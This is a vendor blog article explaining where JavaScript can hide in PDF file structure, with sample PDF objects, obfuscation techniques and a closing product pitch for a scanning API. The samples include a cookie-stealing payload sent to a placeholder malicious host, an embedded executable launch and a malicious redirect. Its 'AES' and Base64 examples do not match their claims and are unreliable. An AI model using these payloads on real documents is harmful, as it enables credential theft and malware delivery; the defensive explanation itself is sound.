Technical Articles

Review Cloudmersive's technical library.

Understanding Embedded JavaScript in PDF Documents
5/29/2024 - Brian O'Neill


hacker writing code concept

Malicious PDFs are an extremely popular attack vector, and that’s not going to change any time soon.

It’s easy for a sophisticated threat actor - especially one with a strong understanding of PDF file structure - to embed malicious JavaScript in sensitive locations within a PDF document.

Embedded malicious scripts can execute and take various actions on their own, and they can execute in response to user interactions within the document. They can be specially designed to exploit vulnerable PDF reader technologies, including those built into our web browsers.

So just where, exactly, can a threat actor embed JavaScript within a PDF document?

In this article, we’ll walk through a few of the key locations we might expect to find JavaScript embedded within PDF file structure. We'll look at a few basic, inert examples of JavaScript injections in a document along the way.

Towards the end, we'll also take a brief look at encrypted and encoded versions of JavaScript injections to understand how threat actors can obfuscate their code.

Understanding PDF File Structure

Before we understand where JavaScript can be embedded within a PDF document, we should first review PDF file structure at a high level.

Header

Every PDF document begins with a header. The header specifies the exact version of PDF formatting that particular PDF document adheres to.

For example, a basic header might look something like %PDF-1.4. The % character is used to indicate the start of a comment within a PDF file.

Body

The body of a PDF document stores all the objects that collectively make up the document contents. Within each object in the PDF body, we can expect to find many different types of data, including metadata, page content data, and data related to interactive elements.

One example of an object is the Pages object. This contains references to all pages within the PDF document, and it's entirely separate from a Page object, which instead represents the structure of each specific page within the document.

We’ll find the actual contents of those pages – such as text and images – stored within the Content Streams object.

All these objects have unique identifiers, and they seamlessly work together to construct the content we see when we open up a PDF file.

Cross-Reference Table (xref)

When a PDF document is loaded in a PDF reader, the xref table functions like a map, helping the PDF reader quickly locate different parts of the document.

xref information is stored in an xref table, and that table efficiently tells the PDF reader exactly where certain content is located.

Trailer

In the Trailer, we’ll find necessary information to process the PDF document – such as the location of the XREF table. We’ll also find the %%EOF (End Of File) comment here to indicate the final line of the document.

Embedding JavaScript Within PDF File Structure

Now that we understand overarching PDF file structure, we can look at specific locations where JavaScript can be embedded to cause various actions to occur within the document.

Catalog Object

The Catalog is the root object of a PDF document, located within the body of the document. It references essential objects within the document.

If, for example, a PDF contained an Outline to help viewers navigate through the document, that Outline would be referenced from the Catalog.

The Catalog is also where OpenAction entries can be specified. OpenAction entries allow various actions to be taken when a PDF document is opened. This is a popular area to embed JavaScript within a PDF document.

Embedded JavaScript in the Catalog can perform malicious actions once the document is opened. Code embedded in the Catalog can be used to exploit vulnerabilities in the viewer’s PDF reader to execute arbitrary code on their system.

Here's a basic example of JavaScript in a simple PDF Catalog that would execute from the OpenAction:

1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R
  /OpenAction <<
    /S /JavaScript
    /JS (app.alert({ cMsg: "You've been hacked!", cTitle: "Warning", nIcon: 1, nType: 0 });)
  >>
>>

Annotations

Annotations provide interactivity for PDF viewers. They can contain anything from simple text to links to complex sound and video elements.

Annotations can also include JavaScript actions. By embedding JavaScript within an Annotation object, a threat actor can trigger a malicious action to occur when the user clicks on the annotation.

If, for example, a malicious PDF was opened within a web browser’s built-in PDF viewer, embedded JavaScript within an interactive Annotation could initiate a Cross-Site Scripting attack, allowing the attacker to perform various actions on behalf of the user.

Here's a simple example of what a JavaScript injection in an Annotation could look like:

4 0 obj
<<
  /Type /Annot
  /Subtype /Text
  /Rect [100 100 200 200]
  /F 4
  /C [1 0 0]
  /T (XSS Attack)
  /Popup 6 0 R
  /Contents (Click me!)
  /Action <<
    /S /JavaScript
    /JS (document.write('<img src="https://malicious-site.com/logger.php?data=' + document.cookie + '" />');)
  >>
>>
endobj

Embedded Files

JavaScript can be used to directly access - and directly open - embedded files within a PDF document. Files are stored within a PDF using object streams, and each embedded file is represented by a file specification dictionary that can be accessed via interactive PDF elements.

For example, interacting with a dynamic Annotation could open a file from an object stream – such as a hidden executable.

Here's a simple example of what a JavaScript Annotation opening an executable within a PDF could look like:

4 0 obj
<<
  /Type /Annot
  /Subtype /Text
  /Rect [100 100 200 200]
  /F 4
  /C [1 0 0]
  /T (Hidden Executable)
  /Popup 6 0 R
  /Contents (Click me!)
  /Action <<
    /S /JavaScript
    /JS (this.exportDataObject({ cName: "executable.exe", nLaunch: 2 });)
  >>
>>
endobj
Interactive Forms

Interactive form fields in a PDF allow users to engage with PDF documents in a similar way to how they might engage with web form entries on a website. Embedding JavaScript within a form field can trigger various malicious actions to occur when the PDF viewer interacts with that part of the form.

If, for example, embedded JavaScript was attempting to link a PDF viewer to a malicious website, it could look like this:

4 0 obj
<<
  /Type /Annot
  /Subtype /Widget
  /FT /Btn
  /T (Redirect Button)
  /F 4
  /Rect [100 100 200 200]
  /AA <<
    /C <<
      /S /JavaScript
      /JS (this.getURL('http://maliciouswebsite.com');)
    >>
  >>
>>
endobj

Obfuscating Malicious Code

We can expect threat actors to make their embedded JavaScript code exceedingly difficult to locate. Threat actors can hide their malicious JavaScript using a few common techniques.

Perhaps the most common among these is encryption. By encrypting malicious code within a PDF, a threat actor can all but ensure their code won’t be legible to those who lack the encryption key. This makes the job of automated security tools extremely difficult - they can't detect what they can't decrypt.

Carrying through the earlier example of a popup OpenAction message in the Catalog, here's what an AES (Advanced Encryption Standard) encrypted version of that code could look like:

1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R
  /OpenAction <<
    /S /JavaScript
    /JS (0x78 0x9c 0xcb 0x48 0xcd 0xc9 0xc9 0xc9 0x57 0x08 0xcf 0x2f 0xca 0x49 0x51 0x28)
  >>
>>
endobj

The above encryption requires the encryption key 'myEncryptionKey123' to reveal the obfuscated code.

Another common obfuscation technique involves manipulating the PDF file format itself. By changing the internal structure of a PDF file (resulting in an invalid PDF document), a threat actor can confuse traditional threat analysis tools, and they can, by the same token, exploit vulnerabilities in PDF readers.

Basic encoding techniques (like Base64 encoding), string manipulation, and even variable renaming can also obscure the purpose of JavaScript code within a document in an effort to avoid detection.

A Base64 encoded version of embedded JavaScript code could automatically decode and execute after bypassing threat detection:

1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R
  /OpenAction <<
    /S /JavaScript
    /JS /JS (JGFwcC5hbGVydCh7IGNNU2c6ICJVb3QgdGhpcyBkYXRhIGlzIGV4aXN0IHZhbHVlIiwnY1RpdGxlOiAiV2FybmluZyIsIG5JY29uOiAxLCBOdHlwZTogMCk7fSk7)

  >>
>>
endobj

Detecting Malicious PDFs with Cloudmersive

The Cloudmersive Advanced Virus Scan API takes a deterministic approach to custom content threat detection. It looks deep within PDF file structure to identify malicious code and improper formatting, ensuring the file contents conform with stringent PDF formatting standards.

To learn more about the Cloudmersive Virus API (including its various iterations and deployment options), please feel free to reach out to a member of our team.

800 free API calls/month, with no expiration

Get started now! or Sign in with Google

Questions? We'll be your guide.

Contact Sales